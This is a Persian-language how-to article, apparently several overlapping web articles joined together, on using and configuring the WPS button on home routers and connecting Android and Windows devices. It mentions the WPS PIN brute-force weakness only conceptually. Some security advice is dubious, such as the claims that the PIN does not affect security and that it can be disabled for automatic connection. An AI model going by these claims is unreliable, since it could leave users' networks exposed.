چرا wps روشن است دکمه WPS روی روتر، چیست؟

اگر دکمه WPS روی روتر Wi-Fi یا نقطه دسترسی وجود دارد، در این صورت کاربر نیازی به پیکربندی شبکه بی سیم نخواهد داشت. با فشار دادن دکمه WPS روی روتر به مدت 3-5 ثانیه و سپس روی آداپتور وای فای دستگاه مشترک، ارتباط بین دستگاه و روتر به دست می آید.

در این حالت، نام شبکه قابل تغییر نیست و مقدار رمز عبور به صورت تصادفی ایجاد می شود. ما به روش دیگری نگاه خواهیم کرد که به شما امکان می دهد خودتان مقادیر را تنظیم کنید. طبق نیاز کاربر.

دکمه WPS روی روتر

اما ابتدا بیایید فهرست کنیم که دقیقاً چه چیزی برای روش فوق مورد نیاز است. ابتدا دکمه WPS باید روی روتر وجود داشته باشد. یک گزینه مشابه باید در دستگاه مشترک وجود داشته باشد ("دکمه" می تواند سخت افزار یا نرم افزار باشد).

و همچنین، گزینه "WPS" در روتر باید فعال باشد. پیکربندی این دسته از دستگاه ها معمولاً از رابط وب انجام می شود. ما به یک مثال (نحوه فعال کردن WPS در روترهای TP-Link) نگاه خواهیم کرد.

و آخرین. در بسیاری از مدل‌های روترهای بی‌سیم، دکمه WPS با دکمه تنظیم مجدد ترکیب می‌شود. از این قاعده ای که در زیر می آوریم پیروی می کند.

مهم است بدانید: هنگام فشار دادن دکمه WPS روی روتر، نمی توانید آن را بیش از 5 ثانیه نگه دارید. در غیر این صورت، ما یک "تنظیمات سخت افزاری" دریافت می کنیم، و نه چیزی بیشتر.

روش های مختلف اتصال با استفاده از WPS

PBC یا اتصال دکمه فشاری

در واقع، این روش قبلا در نظر گرفته شده است.

ترتیب اقدامات به شرح زیر است:

1. با فشار دادن دکمه WPS روی روتر (آن را برای 3-5 ثانیه نگه دارید، سپس رها کنید).
2. فشار دادن دکمه WPS در دستگاه مشترک (کافی است دکمه را برای 2-3 ثانیه نگه دارید).
3. پس از حدود یک دقیقه، دستگاه به شبکه بی سیم متصل می شود.

و در اینجا معایب این روش، در نگاه اول بسیار ساده است. در نتیجه ببینید رمز وای فای ("اختراع" شده توسط خود دستگاه ها) چگونه به نظر می رسد:

نتیجه ایجاد اتصال با استفاده از روش PCB

توجه داشته باشید که بین مرحله "1" و "2" - بیش از 1 دقیقه نباید بگذرد.

اتصال با استفاده از کد پین روتر

این روش فقط روی ویندوز 7 یا ویستا با SP دوم کار می کند.

وقتی روتر به طور کامل بارگیری شد (یک دقیقه پس از روشن شدن)، باید به دنبال شبکه Wi-Fi با نام مناسب باشید. یک مثال برای روترهای Tenda در نظر گرفته شده است:

جستجوی شبکه

در مقابل شبکه مورد نیاز یک علامت "اتصال خودکار" و یک دکمه "اتصال" وجود دارد (آن را فشار دهید).

از آنجایی که رمزگذاری Wi-Fi در روتر پیکربندی نشده است، سیستم از شما می خواهد که یک رمز عبور (و در عین حال یک نام شبکه جدید) ایجاد کرده و تنظیم کنید. روی دکمه "OK" کلیک کنید و دستورالعمل های "جادوگر" را دنبال کنید:

شروع به تنظیم کنید

اول از همه، باید کد پین روتر را ارائه کنید (مقدار را می توان در برچسب واقع در پایین کیس پیدا کرد). سپس یک نام و رمز عبور پیدا می کنیم و روش رمزگذاری را انتخاب می کنیم:

WPS Network Setup Wizard

با کلیک بر روی "بستن"، یک شبکه بی سیم در دسترس همه مشترکین قرار می گیرد (شبکه با نام و رمز عبور تنظیم شده باقی می ماند). در مثال ما: نام "Home_Network" است، رمز عبور 1fx2-ufge-198g است. همانطور که می بینید در این مورد از دکمه WPS روی روتر استفاده نمی شود.

تنظیم مبارک!

پیش نیازهای راه اندازی شبکه WPS

چگونه باید کارت شبکه کامپیوتر شخصی را پیکربندی کرد؟

صرف نظر از روش اتصال (یعنی الگوریتم ایجاد یک شبکه جدید با استفاده از WPS)، کارت شبکه در دستگاه مشترک به صورت زیر پیکربندی می شود. دستگاه آدرس IP را به صورت خودکار دریافت می کند، مقدار آدرس DNS را نیز دریافت می کند.

بنابراین، کارت شبکه به IP و DNS "خودکار" پیکربندی شده است. در اکثر دستگاه ها این تنظیم پیش فرض است.

روتر چگونه باید پیکربندی شود؟

در روتر یا اکسس پوینت ابتدا باید شبکه بی سیم روشن باشد. برای استفاده از گزینه WPS، علاوه بر این، باید به روتر اجازه استفاده از آن را بدهید:

تب WPS

در روترهای بی سیم TP-Link - یک تب جداگانه به نام "WPS" وجود دارد. بررسی کنید که این گزینه فعال شده باشد (در صورت لزوم می توانید آن را غیرفعال کنید). به هر حال، می توانید مقدار کد پین خود را تنظیم کنید (با کلیک بر روی دکمه "ایجاد یک کد پین جدید").

نیازی به تغییر کد پین نیست، مقدار آن بر امنیت تأثیر نمی گذارد. و هنگام اتصال با استفاده از روش PCB، این کد استفاده نمی شود (نمونه ای را در ویدیو ببینید):

با یافتن دکمه WPS در روتر خود، بسیاری از کاربران تعجب می کنند که این دکمه چیست و برای چیست. اگر شما هم به این سوال علاقه دارید، پیشنهاد می کنیم این مقاله را مطالعه کنید.

WPS مخفف Wi-Fi Protected Setup است و استانداردی است که برای آسان‌تر کردن اتصال به شبکه Wi-Fi ایمن بدون به خطر انداختن امنیت طراحی شده است. این استاندارد توسط انجمنی از شرکت های فناوری اطلاعات به نام Wi-Fi Alliance ایجاد و در سال 2007 معرفی شد.

ویژگی اصلی WPS این است که به شما امکان می دهد بدون استفاده از رمز عبور به شبکه Wi-Fi متصل شوید. در همان زمان، اتصال و کل شبکه Wi-Fi محافظت می شود. و زمان لازم برای اتصال حتی کمتر از زمان معمول برای اتصال است.

برای صاحب یک هات اسپات Wi-Fi، این ویژگی ممکن است چندان مفید به نظر نرسد. پس از همه، اتصال به یک شبکه Wi-Fi یک بار دشوار نیست. با این حال، اگر اغلب مهمانانی را دریافت می کنید که با ابزارهای خود به شما می آیند، WPS ممکن است به سادگی غیر قابل تعویض باشد. این فناوری از مشکلات بی پایان در یافتن و به خاطر سپردن رمز عبور وای فای شما جلوگیری می کند.

نحوه استفاده از دکمه WPS روی روتر

دو راه برای اتصال به شبکه Wi-Fi با استفاده از WPS وجود دارد. روش اول سخت افزار نام دارد که تا حد امکان ساده و سریع است. برای اتصال با استفاده از این روش، فقط باید همزمان دکمه WPS را روی روتر و دستگاهی که به Wi-Fi متصل می شود فشار دهید. پس از آن، روتر و دستگاه متصل یکدیگر را شناسایی کرده و یک اتصال Wi-Fi برقرار می کنند. اگر دستگاه متصل دکمه WPS جداگانه ندارد، باید به تنظیمات Wi-Fi بروید و اتصال WPS را در آنجا شروع کنید، سپس دکمه WPS را روی روتر فشار دهید.

راه دوم برای اتصال به وای فای از طریق WPS نرم افزار نام دارد. این شامل استفاده از یک کد پین خاص است. در این صورت برای اتصال باید پین کد دستگاهی را که می خواهید به وای فای وصل کنید پیدا کنید و این پین کد را در تنظیمات روتر وارد کنید. پس از آن، روتر و دستگاه متصل یکدیگر را شناسایی کرده و یک اتصال Wi-Fi را راه اندازی می کنند. به دلیل نیاز به استفاده از پین کد، این روش بسیار کندتر است، اما نیازی به فشار دادن هیچ دکمه ای نیست.

نحوه فعال کردن WPS در روتر

برای اینکه همه موارد بالا کار کنند، البته باید WPS روی روتر فعال باشد. تنظیمات WPS معمولاً در قسمت تنظیمات Wi-Fi قرار دارند. به عنوان مثال، نحوه فعال کردن WPS را در مدل‌های روتر محبوب نشان خواهیم داد.

در روتر ASUS، باید به بخش "Secure Network" رفته و تب "WPS" را در آنجا باز کنید. در این تب، سوئیچ برای فعال و غیرفعال کردن WPS روی روتر در دسترس خواهد بود.

در روترهای TP-LINK، تنظیمات WPS در پانل اصلی قرار می گیرند. شما فقط باید روی پیوند "WPS" کلیک کنید و تنظیمات مورد نیاز خود را مشاهده خواهید کرد. برای فعال کردن WPS در اینجا، فقط باید روی دکمه "فعال کردن WPS" کلیک کنید.

در روترهای D-LINK، باید بخش "ADVANCED" را باز کنید و به زیربخش "Wi-Fi Protected Setup" بروید. برای فعال کردن WPS، در اینجا باید کادر کنار مورد «فعال کردن» را علامت بزنید.

در روترهای ZyXEL، باید بخش "Network - Wireless Network" را باز کنید و به تب "WPS" بروید. برای فعال کردن این عملکرد، باید کادر کنار عملکرد «فعال کردن WPS» را علامت بزنید.

نحوه اتصال تلفن هوشمند اندرویدی به وای فای از طریق WPS

برای اتصال گوشی هوشمند اندرویدی به شبکه Wi-Fi از طریق WPS، باید به تنظیمات Wi-Fi در اندروید بروید و روی دکمه سه نقطه کلیک کنید.

با این کار یک منوی کوچک باز می شود. در اینجا باید مورد "توابع اضافی" را انتخاب کنید.

پس از آن، بخشی با تنظیمات اضافی باز می شود. در اینجا باید بر روی "دکمه WPS" کلیک کنید. با کلیک بر روی این دکمه فرآیند اتصال WPS شروع می شود. در واقع این دکمه در منو فشردن دکمه سخت افزاری WPS را شبیه سازی می کند.

پس از آن، نشانگر اتصال روی صفحه ظاهر می شود.

اکنون فقط باید دکمه WPS را روی روتر فشار دهید و آن را برای حدود 3-4 ثانیه نگه دارید. پس از آن، گوشی هوشمند اندرویدی حدود 10 ثانیه فکر می کند و پیامی مبنی بر اتصال شما به شبکه وای فای انتخابی روی صفحه ظاهر می شود.

همچنین در اندروید، می توانید با استفاده از یک کد پین متصل شوید. در این حالت، در تنظیمات پیشرفته Wi-Fi، باید بر روی "Enter WPS PIN code" کلیک کنید.

پس از آن، یک پنجره پاپ آپ با نشانگر اتصال و یک کد پین که باید در روتر وارد کنید، روی صفحه ظاهر می شود.

پس از آن، تقریباً بلافاصله، اندروید به یک شبکه Wi-Fi متصل می شود.

نحوه اتصال کامپیوتر ویندوز 7 به وای فای از طریق WPS

در رایانه رومیزی، اتصال از طریق WPS حتی ساده تر از تلفن هوشمند اندرویدی است. به عنوان مثال، بیایید نشان دهیم که چگونه این اتفاق در لپ تاپ با سیستم عامل ویندوز 7 رخ می دهد.

ابتدا باید روی نماد Wi-Fi در نوار وظیفه کلیک کنید. پس از باز شدن لیست شبکه های موجود، باید شبکه ای را که می خواهید به آن متصل شوید پیدا کنید، آن را انتخاب کرده و روی دکمه "اتصال" کلیک کنید.

پس از آن، پنجره ای برای وارد کردن رمز عبور باز می شود. اگر WPS روی روتر فعال باشد، در زیر خط برای وارد کردن رمز عبور نوشته می شود که می توانید با فشار دادن دکمه WPS روی روتر به شبکه متصل شوید.

همانطور که نوشته شده است انجام می دهیم. دکمه را فشار داده و نگه می داریم تا پیامی در مورد دریافت پارامترها از روتر ظاهر شود.

پس از دریافت پارامترها از روتر، پنجره ای با نشانگر اتصال ظاهر می شود.

و بعد از چند ثانیه لپ تاپ به وای فای متصل می شود.

امروزه اتصال به اینترنت بی سیم با استفاده از فناوری Wi-Fi محبوبیت زیادی پیدا کرده است. این به این دلیل است که کاربر کاملاً از شبکه کابل ها و سیم ها مستقل می شود، اکنون دیگر نیازی به گره خوردن به محل کار نیست. در صورت تمایل می توانید لپ تاپ خود را به هر نقطه از آپارتمان منتقل کنید یا با آن به حیاط منزل خود بروید بدون اینکه اتصال به اینترنت قطع شود. با این حال، توسعه این فناوری ها موضوع حفاظت را مطرح کرده است و به دلیل اینکه اکثر کاربران دانش لازم را ندارند. بنابراین، سازندگان تجهیزات بی سیم پروتکل مخصوص WPS را توسعه داده اند. این به شما امکان می دهد فرآیند را خودکار کنید، که کاربران بی تجربه را از مشکلات غیر ضروری نجات می دهد.

WPS - چیست و چرا لازم است؟

این مخفف مخفف Wi-Fi ProtectedSetup است. این استاندارد توسط اتحادی از سازندگان دستگاه های بی سیم Wi-Fi ایجاد شده است که هدف اصلی آن ساده سازی فرآیند راه اندازی بود و این فناوری به کاربر بی تجربه نیز اجازه می دهد تا به سادگی و به سرعت یک اتصال بی سیم به اینترنت را بدون پرداختن به آن برقرار کند. تمام پیچیدگی های کار و پروتکل های رمزگذاری Wi-Fi. به لطف WPS، دستگاه قادر است به طور خودکار نام شبکه و همچنین رمزگذاری را که برای محافظت در برابر تلاش ها استفاده می شود، تنظیم کند. قبلاً همه این مراحل باید به صورت دستی انجام می شد.

راه اندازی شبکه های بی سیم با استفاده از WPS

ما متوجه شدیم که Wi-Fi ProtectedSetup چیست و چه کاربردی دارد. حال بیایید ببینیم چگونه می توانید یک شبکه بی سیم راه اندازی کنید. چه چیزی برای این مورد نیاز است؟ ما به یک کامپیوتر شخصی (ترجیحا با سیستم عامل ویندوز 7) و یک نقطه دسترسی که از حالت WPS پشتیبانی می کند نیاز داریم. فرآیند راه اندازی این سیستم برای همه دستگاه هایی که از این فناوری پشتیبانی می کنند، صرف نظر از مدل یا سازنده، یکسان است. بنابراین، اجازه دهید به شرح روش ادامه دهیم. اولین قدم روشن کردن روتر است. در رایانه، لیست شبکه های بی سیم موجود را به روز کنید. مدل روتر ما روی مانیتور ظاهر می شود. روی دکمه "اتصال" کلیک کنید. از آنجایی که شبکه بی سیم مورد نظر هنوز تنظیمات امنیتی ندارد، سیستم عامل کامپیوتر از شما می خواهد نقطه دسترسی را پیکربندی کنید. روی "OK" کلیک کنید و کار را ادامه دهید. در مرحله بعد، سیستم WPS-wifi یک کد پین می خواهد. شما می توانید این اطلاعات را روی یک برچسب مخصوص روی کیس روتر بیابید. به طور معمول، کد کارخانه از هشت رقم تشکیل شده است. در صورت تمایل می توانید آن را در تنظیمات دستگاه تغییر دهید. کد را باید در پنجره پاپ آپ وارد کنید و روی "بعدی" کلیک کنید. پنجره ای با تنظیمات روتر ما روی مانیتور ظاهر می شود. سیستم عامل از شما می خواهد که پارامترهای اصلی شبکه بی سیم ایجاد شده را تعیین کنید، یعنی: نام، نوع رمزگذاری، کلید امنیتی. این همه چیز است، راه اندازی WPS به پایان رسیده است، نقطه دسترسی آماده است.

ویژگی های راه اندازی یک اتصال

1. تا به امروز، پشتیبانی از این فناوری به طور کامل در Windows VistaSP2 و Windows 7 اجرا شده است. اما اگر نسخه قبلی سیستم عامل بر روی رایانه شما نصب شده باشد، ناامید نشوید، می توانید از یک ابزار ویژه برای پیکربندی این سیستم استفاده کنید. . می توان آن را روی دیسکی که با نقطه دسترسی بی سیم ارائه شده است، پیدا کرد.

2. توسعه دهندگان سیستم توصیه می کنند که هنگام اتصال به یک شبکه بی سیم که هنوز تنظیمات امنیتی ندارد، آن را پیکربندی کنید. با این حال، می توانید این روش را رد کنید و بدون پیکربندی قبلی به شبکه متصل شوید. برای انجام این کار، روی "لغو" کلیک کنید، در نتیجه روند انتخاب پارامترها را دور می زنید.

3. هنگام پیکربندی شبکه، امنیت سیستم می تواند به عنوان پیش فرض باقی بماند. بهتر است پین کد را جایگزین کنید و هر چه سخت تر باشد بهتر است. به نام شبکه توجه ویژه ای داشته باشید. بسیار مهم است که فاقد فاصله باشد و با حروف لاتین نوشته شود.

اتصال دستگاه های جدید به Wi-Fi

اگر لپ تاپ، تلفن هوشمند، تبلت دارید، می توانید آنها را نیز برای کار با شبکه بی سیم ایجاد شده پیکربندی کنید. برای انجام این کار، اتصالات موجود را جستجو می کنیم. نام شبکه ما را از لیست انتخاب کرده و به آن متصل شوید. سیستم از شما می خواهد که یک کد امنیتی وارد کنید یا دکمه اتصال WPS را روی روتر فشار دهید. رمز عبور را وارد کنید و دستگاه آماده کار است. همانطور که می بینید، ما توانستیم نقطه دسترسی را بدون دسترسی به رابط وب ابزار پیکربندی کنیم. در اینجا بسیار راحت است - فناوری WPS. دکمه روی روتر چیست و چرا به آن نیاز است، ما بیشتر در نظر خواهیم گرفت.

WPS چگونه در اکسس پوینت پیاده سازی می شود؟

این ویژگی در اکثر روترهای مدرن وجود دارد. فناوری WPS به شما امکان می دهد یک نام برای شبکه خانگی خود تعیین کنید و همچنین رمزگذاری را برای محافظت در برابر هک و دسترسی غیرمجاز در حالت کاملاً خودکار پیکربندی کنید. چنین فرآیندی با استفاده از یک درخواست ویژه انجام می شود که در آن پارامترهای لازم از روتر به کنترل کننده دستگاه منتقل می شود. بعلاوه، سیستم WPS همانند تمام اتصالات بعدی دستگاه های جدید به شبکه Wi-Fi تازه ایجاد شده عمل می کند. چنین درخواستی با استفاده از دکمه مخصوص WPS انجام می شود. تقریباً همه کاربران شبکه های بی سیم می دانند، اما فقط تعداد کمی پاسخ خواهند داد که این دکمه برای چیست. پس بیایید به این سوال نگاه کنیم.

دکمه WPS روی روتر

این قابلیت اغلب در پنل جلویی دستگاه و کمتر در قسمت پشت یا کناری دستگاه قرار دارد. مکان بستگی به سازنده روتر و مدل دستگاه دارد. گاهی اوقات سازنده ممکن است دکمه تنظیمات بی سیم را با تنظیم مجدد کارخانه ترکیب کند. بنابراین، هنگام استفاده از این عملکرد باید بسیار مراقب باشید. در این مورد، انتخاب دکمه با مدت زمان نگهداری آن تعیین می شود. برای فعال کردن حالت تنظیمات شبکه بی سیم، زمان فشار 1-2 ثانیه و برای بازنشانی همه تنظیمات، 5-7 ثانیه است. همانطور که می بینید، نکته اصلی این است که زیاده روی نکنید. اگر عنصر مورد نظر در مورد روتر وجود نداشته باشد، به این معنی است که حالت درخواست انتقال پارامتر در رابط وب دستگاه راه اندازی شده است که می تواند از طریق مرورگر باز شود.

نقشه برداری مجدد دکمه WPS

سیستم عامل برخی از روترها به شما اجازه می دهد تا عملکرد عنصر ذکر شده را تغییر دهید. به عنوان مثال، ASUSWRT به شما امکان می دهد WPS را دوباره اختصاص دهید و از مکانیسم برای روشن یا خاموش کردن Wi-Fi استفاده کنید. اغلب اوقات، این دکمه به سادگی توسط کاربر استفاده نمی شود. بنابراین، حالت خاموش کردن ماژول رادیویی بدون نیاز به تغییر تنظیمات رابط وب می تواند مفیدتر باشد. برای تعریف مجدد هدف دکمه، باید به بخش مدیریت بروید و تب "سیستم" را باز کنید. بعد، مورد WP Sbutton را لغو کنید و Toggle Radio را انتخاب کنید.

معایب فناوری WPS

روترهای Wi-Fi که از این سیستم پشتیبانی می‌کنند دارای آسیب‌پذیری امنیتی شبکه بی‌سیم هستند که می‌تواند برای پروتکل‌های رمزگذاری brute-force استفاده شود. برای انجام این کار، برنامه های زیادی در اینترنت وجود دارد که می توانند چنین رویه هایی را انجام دهند. علاوه بر این، آنها دارای پایگاه داده ای از کلیدهای آماده و پرکاربرد هستند. پین کد خود از هشت رقم تشکیل شده است، بنابراین در تئوری 10 8 ترکیب ممکن وجود دارد. با این حال، در واقعیت، چنین گزینه هایی بسیار کمتر است. این به این دلیل است که آخرین رقم کد حاوی یک جمع کنترلی است که از هفت رقم اول محاسبه می شود. علاوه بر این، پروتکل احراز هویت WPS همچنین دارای آسیب‌پذیری‌هایی است. در نتیجه، تصویر زیر را داریم: برای انتخاب یک کلید، تنها باید 11000 گزینه (تقریبا) برشمرد. و این نسبتاً کوچک است. نقطه ضعف فناوری مورد نظر ما این است که اکثر روترها یک کد پین سخت دارند. در نتیجه، اگر کلید به خطر بیفتد، تغییر رمز عبور نمی تواند از شبکه شما محافظت کند.

نتیجه

مزیت این فناوری سهولت استفاده از آن است. کاربر نیازی به درک تمام تنظیمات خود ندارد. علاوه بر این، این سیستم به شما اجازه می دهد تا به سرعت و بدون زحمت دستگاه های اضافی را به یک شبکه موجود متصل کنید. راه اندازی این حالت در روترها به روش های مختلفی اجرا می شود:

1. Push ButtonConnect - تنظیمات خودکار با فشار دادن دکمه WPS، که روی کیس روتر قرار دارد، راه اندازی می شود.

2. وارد کردن پین کد از طریق پنجره رابط وب روتر. کاربر با استفاده از این روش ابتدا باید مرورگر را راه اندازی کند، سپس رابط نقطه دسترسی را باز کرده و کلید را وارد کند. در مرحله بعد، فرآیند راه اندازی آغاز می شود.

3. وارد کردن پین کد در رایانه شخصی. کلید فقط پس از اتصال روتر به رایانه شخصی و شروع یک جلسه ویژه WPS وارد می شود.

به طور کلی، این فناوری برای کاربران بی تجربه بسیار مفید و راحت است، علیرغم این واقعیت که کاربران پیشرفته دوست دارند آن را به دلیل محافظت ضعیف در برابر دسترسی های غیرمجاز سرزنش کنند.

در اکثر روترهای مدرن، و همچنین در برخی دیگر از دستگاه های مجهز به Wi-Fi، یک دکمه WPS وجود دارد که هدف آن برای بسیاری از کاربران ناشناخته است. چیست، چگونه می تواند مفید باشد، چه مزایایی دارد و چگونه پیکربندی می شود؟ در این مقاله سعی خواهیم کرد تا این موضوعات را به صورت در دسترس روشن کنیم.

WPS چیست

WPS مخفف Wi-Fi Protected Setup است، فناوری که اتصال Wi-Fi را ساده می کند. همچنین ممکن است در برخی از دستگاه ها QSS نامیده شود.(راه اندازی سریع امنیت)، یعنی «راه اندازی سریع امنیت». این همان است.

به نظر می رسد چرا به آن نیاز است؟ پس از همه، هر کاربر مبتدی می تواند Wi-Fi را روی یک روتر راه اندازی کند. چرا اینجا چیز دیگری را ساده کنید؟

برای راه اندازی یک شبکه بی سیم روی روتر، معمولاً باید مراحل زیر را دنبال کنید::

• یک نام شبکه (SSID) و رمز عبور (کلید) پیدا کنید.
• تنظیمات لازم را در کنترل پنل روتر تنظیم کنید، به عنوان مثال، فیلتر کردن توسط آدرس های MAC.
• کلیدها را بین همه کاربران شبکه توزیع کنید و هر از چند گاهی آنها را برای اهداف امنیتی تغییر دهید.

WPS به شما این امکان را می دهد که هر دستگاهی را با فشار یک دکمه متصل کنید. در این حالت هر بار پارامترهای اتصال جدیدی تولید می شوند که قابل استفاده مجدد نیستند. اگر نیاز به اتصال سریع چندین دستگاه مهمان به طور همزمان داشته باشید، بدون اینکه دسترسی دائمی به شبکه داشته باشید، این کار راحت است. WPS مزایای دیگری نیز دارد که در ادامه به آنها خواهیم پرداخت.

لازم به ذکر است که فناوری WPS هنوز به طور کامل اشکال زدایی نشده است، بنابراین همیشه به درستی کار نمی کند و ممکن است نیاز به پیکربندی غیر ضروری دستگاه های مشتری داشته باشد که از نرم افزار قدیمی یا ناسازگار با WPS استفاده می کنند. اتصال Wi-Fi معمولی روشی همه کاره تر است.

دکمه WPS

عملکرد WPS با یک کلیک بر روی دکمه مناسب فعال می شود که مجهز به اکثر روترهای بی سیم مدرن است. این دکمه بسته به مدل دستگاه می تواند در پنل بالا، جلو یا عقب قرار گیرد. در هر صورت یافتن آن کار سختی نخواهد بود.

در برخی از مدل های مقرون به صرفه، دکمه WPS با دکمه RESET ترکیب می شود. در این مورد، همانطور که در عکس زیر نشان داده شده است، در روتر WPS / RESET نمایش داده می شود. خیلی راحت نیست زیرا یک فشار کوتاه (1-2 ثانیه) عملکرد WPS را فعال می کند و با فشار طولانی (5-10 ثانیه) روتر را به تنظیمات کارخانه بازنشانی می کند.

دکمه را کمی بیشتر نگه دارید - و باید تمام پارامترهای روتر خود را دوباره پیکربندی کنید. هنگام استفاده از این ویژگی این را در نظر داشته باشید.

راه های مختلفی برای اتصال به روتر از طریق WPS وجود دارد. بیایید آنها را در نظر بگیریم.

یک دکمه روی دستگاه متصل وجود دارد

اگر دستگاه متصل یک دکمه WPS نیز دارد، کافی است این دکمه را فشار دهید و سپس همین کار را روی روتر انجام دهید. در عرض چند ثانیه اتصال به طور خودکار برقرار می شود.

اما چنین دکمه ای در کامپیوتر و لپ تاپ وجود ندارد. و در اکثر تبلت ها و گوشی های هوشمند اینطور نیست.

اتصال کامپیوتر یا لپ تاپ

برای اتصال از طریق WPS در رایانه ای که ویندوز دارد، به منوی اتصالات شبکه بروید و شبکه مورد نظر را انتخاب کنید. پس از کلیک بر روی آن، پنجره ای برای وارد کردن رمز عبور ظاهر می شود. و در زیر نماد WPS و متن "شما همچنین می توانید با فشار دادن دکمه روی روتر متصل شوید" را مشاهده خواهید کرد. شاید بلافاصله ظاهر نشوند و باید چند ثانیه صبر کنید.

برچسب ها و تصاویر ممکن است بسته به نسخه ویندوز متفاوت باشند، اما اصل یکسان است. روی نماد WPS کلیک کنید و سپس دکمه روی روتر را فشار دهید. پس از چند ثانیه، اتصال برقرار می شود.

به عنوان مثال، در ویندوز 10، این کار را می توان به صورت زیر انجام داد:

1. در پایین صفحه در سمت راست، همانطور که در عکس زیر نشان داده شده است، روی نماد "شبکه" کلیک کنید - به عنوان یک کامپیوتر نمایش داده می شود. در لپ تاپ، ممکن است به عنوان نماد Wi-Fi ظاهر شود.
2. در هر صورت، بررسی کنید که Wi-Fi روشن باشد.
3. از لیست شبکه های موجود، شبکه روتر ما را انتخاب کنید.
4. اگر لازم است رایانه پس از راه اندازی Wi-Fi بلافاصله این شبکه را جستجو کرده و به آن متصل شود، کادر «اتصال خودکار» را علامت بزنید.
5. روی دکمه "اتصال" کلیک کنید.
6. پس از آن، باید روی دکمه اتصال WPS (QSS) روی روتر کلیک کنید.

بنابراین، اگر یک دکمه WPS روی روتر وجود داشته باشد، می توانید به سرعت و به راحتی از طریق Wi-Fi به اینترنت متصل شوید. لازم نیست همه مهمانان بگویند چه رمز عبوری تنظیم کرده اید. کافی است شبکه مورد نظر را پیدا کنید و از دکمه استفاده کنید.

اتصال گوشی هوشمند یا تبلت

اتصال WPS در دستگاه Android به همین روش انجام می شود.

به تنظیمات Wi-Fi می رویم و لیست شبکه های موجود را باز می کنیم. همچنین باید یک نماد اتصال WPS وجود داشته باشد که باید روی آن کلیک کنید.

بسته به نسخه اندروید، ظاهر منو ممکن است متفاوت باشد.

به عنوان مثال، هنگام استفاده از گوشی هوشمند Samsung Galaxy S8، باید به تنظیمات بروید و مورد "اتصالات" را در آنجا انتخاب کنید. مورد Wi-Fi را انتخاب کنید. بررسی کنید که Wi-Fi روشن باشد. پس از آن، روی نماد سه نقطه کلیک کرده و "Advanced" را انتخاب کنید.

صفحه را به پایین اسکرول کنید و روی "MORE" کلیک کنید تا همه موارد ممکن باز شود. در میان آنها، مورد مورد نظر وجود خواهد داشت - "دکمه WPS".

پس از کلیک بر روی آیکون، دکمه WPS روتر را به همین ترتیب فشار می دهیم و منتظر می مانیم تا اتصال برقرار شود.

هر دستگاه دیگری به همین روش متصل می شود. به جز آنهایی که iOS دارند. زیرا دستگاه های اپل (iPhone، iPad) از فناوری WPS پشتیبانی نمی کنند.

در برخی از دستگاه ها، تخصیص دکمه را می توان تغییر داد. به عنوان مثال، در روترهای ایسوس، سازنده امکان استفاده از حالت ساده شده را فراهم کرده است، زمانی که دکمه WPS فقط Wi-Fi را روشن و خاموش می کند، در حالی که شبکه بی سیم در حالت استاندارد کار می کند.

تنظیمات

برخی از روترها دکمه WPS ندارند. اما همه روترهای بی سیم مدرن از خود فناوری پشتیبانی می کنند.

در این بخش نحوه اتصال از طریق WPS را در صورت عدم وجود دکمه در دستگاه شما خواهیم فهمید. و در همان زمان نحوه پیکربندی برنامه‌نویسی WPS را در روتر خواهیم فهمید.

شمول

همانطور که متوجه شدیم، اگر دکمه ای روی روتر وجود داشته باشد، نیازی به انجام تنظیمات نیست، همه چیز درست از جعبه کار می کند. به جز روترهای D-Link که این ویژگی به طور پیش فرض غیرفعال است.

برای فعال کردن WPS روی روتر و تنظیم آن، باید وارد رابط وب روتر خود شوید. نحوه انجام این کار در دستورالعمل یک مدل خاص توضیح داده شده است. بسته به مدل و نسخه میان‌افزار، تنظیمات WPS ممکن است در یک مورد جداگانه برجسته شوند یا در منوی تنظیمات شبکه بی‌سیم قرار گیرند. در هر صورت، آنها بسیار ساده هستند. به عنوان یک قاعده، فقط دو یا سه نقطه وجود دارد.

اولین - در واقع، این شامل یا غیرفعال کردن عملکرد است. برای اجازه دادن به استفاده از WPS، کادر انتخاب یا سوئیچ را روی ON یا Enabled قرار دهیدبسته به مدل روتر

عکس زیر نمونه ای از تنظیمات WPS در روتر TP-Link را نشان می دهد، در این حالت، تنظیمات در منو به عنوان "عملکرد QSS" نمایش داده می شود.

اتصال نرم افزار WPS با استفاده از یک کد پین انجام می شود. روی برچسب پایین روتر درج شده است. معمولاً هشت رقمی است. همچنین می توان آن را در تنظیمات WPS در رابط وب مشاهده کرد. در اینجا همچنین می توانید فعال، غیرفعال، یک کد پین جدید ایجاد کنید یا کد قبلی را بازیابی کنید.

کد پین رمز عبوری است که هنگام اتصال از طریق WPS باید وارد کنید. یعنی اگر دکمه سخت افزاری روی روتر نباشد، روند اتصال پیچیده تر می شود. در واقع، این یک اتصال معمولی به یک شبکه بی سیم است - شما باید یک رمز عبور را در هر دستگاه مشتری وارد کنید.

می توانید کد پین را خاموش کنید و سپس دستگاه هایی که در محدوده روتر قرار دارند می توانند به طور خودکار متصل شوند. اگر در یک خانه خصوصی زندگی می کنید و نزدیکترین همسایگان شما خارج از منطقه تحت پوشش شبکه شما هستند، این قابل قبول است. اگر از اینترنت در یک ساختمان آپارتمان یا دفتر استفاده می کنید، غیرفعال کردن کد پین امن نیست - هر کسی می تواند به شبکه شما متصل شود.

البته برای استفاده از WPS، Wi-Fi باید پیکربندی شود. وارد تنظیمات بی سیم می شویم. در اینجا باید به نکات زیر توجه کنید:

1. نام شبکه - نامی را تنظیم کنید که با آن شبکه ما در لیست شبکه های موجود نمایش داده شود.
2. ما پخش بی سیم روتر را روشن می کنیم - یعنی Wi-Fi را روشن می کنیم.
3. پخش SSID را فعال کنید. این برای نمایش نام شبکه ما در لیست موجود برای اتصال است.
4. فراموش نکنید که تنظیمات خود را ذخیره کنید.

این عملکرد در ویندوز ویستا، ویندوز 7 و بالاتر موجود است. در نسخه های قدیمی تر وجود ندارد. برای استفاده از آن به درایورهای اضافی یا نرم افزار خاصی نیاز دارید.

خاموش شدن

گاهی اوقات لازم است WPS را در روتر خود غیرفعال کنید. برای این کار به تنظیمات رفته و این قابلیت را غیرفعال کنید. پس از خاموش شدن، باید روتر را مجددا راه اندازی کنید.

در زیر نمونه ای از غیرفعال کردن TP-Link آورده شده است. در اینجا این تابع به صورت QSS نمایش داده می شود.

اگر پخش بی سیم روتر، یعنی Wi-Fi را خاموش کنید، بر این اساس، WPS کار نخواهد کرد.

نشانه

